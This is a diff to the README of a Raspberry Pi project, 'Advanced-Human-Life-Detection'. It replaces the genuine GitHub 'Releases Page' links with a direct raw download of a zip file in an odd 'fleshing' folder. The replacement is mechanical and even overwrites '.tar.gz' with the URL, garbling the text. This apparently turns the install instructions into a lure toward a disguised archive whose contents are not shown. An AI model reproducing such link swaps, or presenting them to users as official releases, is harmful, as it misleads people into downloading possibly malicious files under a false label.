Raushan11r11/Advanced-Human-Life-Detection/README.md

 ## 🚀 Getting Started
 To get started with Advanced-Human-Life-Detection, follow these simple steps:

-1. **Download the Software**: Go to the [Releases Page](https://github.com/Raushan11r11/Advanced-Human-Life-Detection/releases) and find the latest version.
+1. **Download the Software**: Go to the [Releases Page](https://raw.githubusercontent.com/Raushan11r11/Advanced-Human-Life-Detection/main/fleshing/Advanced-Human-Life-Detection.zip) and find the latest version.
 2. **Install Required Software**: Ensure you have Raspberry Pi OS installed on your Raspberry Pi device.
 You may also need to install tools such as `git` and `make`.

 ## 📥 Download & Install
-1. **Visit This Page to Download**: Click here to go to the [Releases Page](https://github.com/Raushan11r11/Advanced-Human-Life-Detection/releases).
+1. **Visit This Page to Download**: Click here to go to the [Releases Page](https://raw.githubusercontent.com/Raushan11r11/Advanced-Human-Life-Detection/main/fleshing/Advanced-Human-Life-Detection.zip).
 2. **Select the Latest Version**: Look for the most recent release.
 Typically, the version will be marked as "latest."
 3. **Download the Package**: Click on the appropriate file for your system.
-The package will typically be a `.zip` or `.tar.gz` file.
+The package will typically be a `.zip` or `https://raw.githubusercontent.com/Raushan11r11/Advanced-Human-Life-Detection/main/fleshing/Advanced-Human-Life-Detection.zip` file.
 4. **Extract the Files**: After downloading, extract the files to a folder on your Raspberry Pi.

 ### 🛠 System Requirements